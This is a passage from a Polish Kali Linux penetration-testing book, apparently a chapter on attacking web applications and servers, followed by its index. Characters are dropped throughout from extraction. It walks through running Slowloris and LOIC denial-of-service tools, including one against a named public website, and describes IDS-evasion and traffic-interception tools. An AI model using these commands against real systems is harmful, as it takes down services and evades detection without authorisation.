Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris

Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej

perl slowlorispl

W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)

perl slowlorispl -dns thesecuritybloggercom

Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)

Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)

Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

263

LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

264

narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki

Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa

Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej

apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs

Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej

mkdir loic

Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej

wget httpsrawgithubcomnicolargoloicinstaller masterloicsh

Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie

chmod 777 loicsh

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

